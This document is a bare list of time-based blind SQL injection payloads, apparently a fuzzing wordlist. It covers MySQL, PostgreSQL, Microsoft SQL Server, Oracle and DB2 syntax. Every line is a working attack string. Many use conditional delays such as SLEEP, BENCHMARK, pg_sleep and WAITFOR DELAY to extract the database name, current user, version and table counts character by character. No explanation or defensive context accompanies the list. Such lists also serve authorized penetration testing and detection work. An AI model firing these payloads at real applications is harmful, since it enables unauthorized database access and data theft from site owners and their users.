' AND SLEEP(5)--
' AND SLEEP(5)=0--
' AND (SELECT SLEEP(5))--
' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--
' AND IF(1=1,SLEEP(5),0)--
' AND IF(1=2,SLEEP(5),0)--
' AND IF(ASCII(SUBSTRING((SELECT DATABASE()),1,1))>64,SLEEP(5),0)--
' AND IF(ASCII(SUBSTRING((SELECT DATABASE()),1,1))<91,SLEEP(5),0)--
' AND IF((SELECT COUNT(*) FROM users)>0,SLEEP(5),0)--
' AND IF((SELECT COUNT(*) FROM information_schema.tables)>10,SLEEP(5),0)--
' AND IF((SELECT LENGTH(DATABASE()))>0,SLEEP(5),0)--
' AND IF((SELECT SUBSTRING(DATABASE(),1,1))='a',SLEEP(5),0)--
' AND IF((SELECT SUBSTRING(DATABASE(),1,1))='b',SLEEP(5),0)--
' AND IF((SELECT SUBSTRING(DATABASE(),1,1))='c',SLEEP(5),0)--
' AND IF((SELECT user())='root@localhost',SLEEP(5),0)--
' AND IF((SELECT version()) LIKE '5%',SLEEP(5),0)--
' AND IF((SELECT version()) LIKE '8%',SLEEP(5),0)--
' AND CASE WHEN (1=1) THEN SLEEP(5) ELSE 0 END--
' AND CASE WHEN (1=2) THEN SLEEP(5) ELSE 0 END--
' AND CASE WHEN (ASCII(SUBSTRING((SELECT DATABASE()),1,1))>64) THEN SLEEP(5) ELSE 0 END--
' AND CASE WHEN ((SELECT COUNT(*) FROM users)>0) THEN SLEEP(5) ELSE 0 END--
' AND CASE WHEN ((SELECT user())='root@localhost') THEN SLEEP(5) ELSE 0 END--
' AND CASE WHEN ((SELECT database())='testdb') THEN SLEEP(5) ELSE 0 END--
' AND BENCHMARK(5000000,MD5('test'))--
' AND BENCHMARK(10000000,SHA1('test'))--
' AND BENCHMARK(5000000,ENCODE('test','key'))--
' AND IF(1=1,BENCHMARK(5000000,MD5('test')),0)--
' AND IF(1=2,BENCHMARK(5000000,MD5('test')),0)--
' AND IF(ASCII(SUBSTRING((SELECT DATABASE()),1,1))>64,BENCHMARK(5000000,MD5('test')),0)--
' AND IF((SELECT COUNT(*) FROM users)>0,BENCHMARK(5000000,MD5('test')),0)--
' AND (SELECT COUNT(*) FROM GENERATE_SERIES(1,5000000))--
' AND (SELECT pg_sleep(5))--
' AND (SELECT CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END)--
' AND (SELECT CASE WHEN (1=2) THEN pg_sleep(5) ELSE pg_sleep(0) END)--
' AND (SELECT CASE WHEN (ASCII(SUBSTRING((SELECT current_database()),1,1))>64) THEN pg_sleep(5) ELSE pg_sleep(0) END)--
' AND (SELECT CASE WHEN ((SELECT COUNT(*) FROM pg_tables)>0) THEN pg_sleep(5) ELSE pg_sleep(0) END)--
' AND (SELECT CASE WHEN ((SELECT current_user)='postgres') THEN pg_sleep(5) ELSE pg_sleep(0) END)--
' AND (SELECT CASE WHEN ((SELECT version()) LIKE 'PostgreSQL%') THEN pg_sleep(5) ELSE pg_sleep(0) END)--
'; WAITFOR DELAY '00:00:05'--
'; IF (1=1) WAITFOR DELAY '00:00:05'--
'; IF (1=2) WAITFOR DELAY '00:00:05'--
'; IF (ASCII(SUBSTRING((SELECT DB_NAME()),1,1))>64) WAITFOR DELAY '00:00:05'--
'; IF ((SELECT COUNT(*) FROM sys.tables)>0) WAITFOR DELAY '00:00:05'--
'; IF ((SELECT SYSTEM_USER)='sa') WAITFOR DELAY '00:00:05'--
'; IF ((SELECT @@version) LIKE 'Microsoft%') WAITFOR DELAY '00:00:05'--
' AND (SELECT COUNT(*) FROM sysibm.sysdummy1 WHERE (SELECT COUNT(*) FROM sysibm.systables)>0 AND 1=(SELECT COUNT(*) FROM sysibm.sysdummy1 WHERE ASCII(SUBSTR((SELECT current server FROM sysibm.sysdummy1),1,1))>64))--
' AND DBMS_LOCK.SLEEP(5)--
' AND (SELECT CASE WHEN (1=1) THEN DBMS_LOCK.SLEEP(5) ELSE DBMS_LOCK.SLEEP(0) END FROM dual)--
' AND (SELECT CASE WHEN (1=2) THEN DBMS_LOCK.SLEEP(5) ELSE DBMS_LOCK.SLEEP(0) END FROM dual)--
' AND (SELECT CASE WHEN (ASCII(SUBSTR((SELECT user FROM dual),1,1))>64) THEN DBMS_LOCK.SLEEP(5) ELSE DBMS_LOCK.SLEEP(0) END FROM dual)--
' AND (SELECT CASE WHEN ((SELECT COUNT(*) FROM all_tables)>0) THEN DBMS_LOCK.SLEEP(5) ELSE DBMS_LOCK.SLEEP(0) END FROM dual)--
' AND (SELECT CASE WHEN ((SELECT user FROM dual)='SYSTEM') THEN DBMS_LOCK.SLEEP(5) ELSE DBMS_LOCK.SLEEP(0) END FROM dual)--
' AND (SELECT CASE WHEN ((SELECT banner FROM v$version WHERE ROWNUM=1) LIKE 'Oracle%') THEN DBMS_LOCK.SLEEP(5) ELSE DBMS_LOCK.SLEEP(0) END FROM dual)--
' UNION SELECT NULL,NULL,NULL,NULL,SLEEP(5)--
' UNION SELECT NULL,NULL,NULL,SLEEP(5)--
' UNION SELECT NULL,NULL,SLEEP(5)--
' UNION SELECT NULL,SLEEP(5)--
' UNION SELECT SLEEP(5)--
' UNION SELECT 1,2,3,4,5,SLEEP(5)--
' UNION SELECT 1,2,3,SLEEP(5)--
' UNION SELECT 1,SLEEP(5)--
' OR SLEEP(5)--
' OR (SELECT SLEEP(5))--
' OR IF(1=1,SLEEP(5),0)--
' OR BENCHMARK(5000000,MD5('test'))--
' OR pg_sleep(5)--
'; WAITFOR DELAY '00:00:05'; SELECT 1--
' AND (SELECT 1 FROM (SELECT SLEEP(5))a)--
' AND (SELECT 1 FROM (SELECT IF(1=1,SLEEP(5),0))a)--
' AND (SELECT 1 FROM (SELECT BENCHMARK(5000000,MD5('test')))a)--
' AND 1=(SELECT 1 FROM (SELECT SLEEP(5))a)--
' AND 'a'=(SELECT 'a' FROM (SELECT SLEEP(5))a)--
' AND EXISTS(SELECT * FROM (SELECT SLEEP(5))a)--
' AND 1 IN (SELECT 1 FROM (SELECT SLEEP(5))a)--
' AND 1 LIKE (SELECT 1 FROM (SELECT SLEEP(5))a)--
' RLIKE SLEEP(5)--
' RLIKE (SELECT SLEEP(5))--
' RLIKE (SELECT * FROM (SELECT SLEEP(5))a)--
' AND SLEEP(5) AND '1'='1
' AND SLEEP(5) AND 1=1--
' OR SLEEP(5) OR '1'='1
' OR SLEEP(5) OR 1=1--
') AND SLEEP(5) AND ('1'='1
') AND SLEEP(5) AND (1=1)--
') OR SLEEP(5) OR ('1'='1
') OR SLEEP(5) OR (1=1)--
")) AND SLEEP(5) AND (("1"="1
")) AND SLEEP(5) AND ((1=1))--
")) OR SLEEP(5) OR (("1"="1
")) OR SLEEP(5) OR ((1=1))--
' AND (SELECT 1 FROM (SELECT SLEEP(5) UNION SELECT 1)a)--
' AND (SELECT 1 FROM (SELECT SLEEP(5) UNION SELECT 2 UNION SELECT 3)a)--
' AND (SELECT COUNT(*) FROM (SELECT SLEEP(5) UNION SELECT 1)a)--
' AND (SELECT MAX(1) FROM (SELECT SLEEP(5) UNION SELECT 1)a)--
' AND (SELECT MIN(1) FROM (SELECT SLEEP(5) UNION SELECT 1)a)--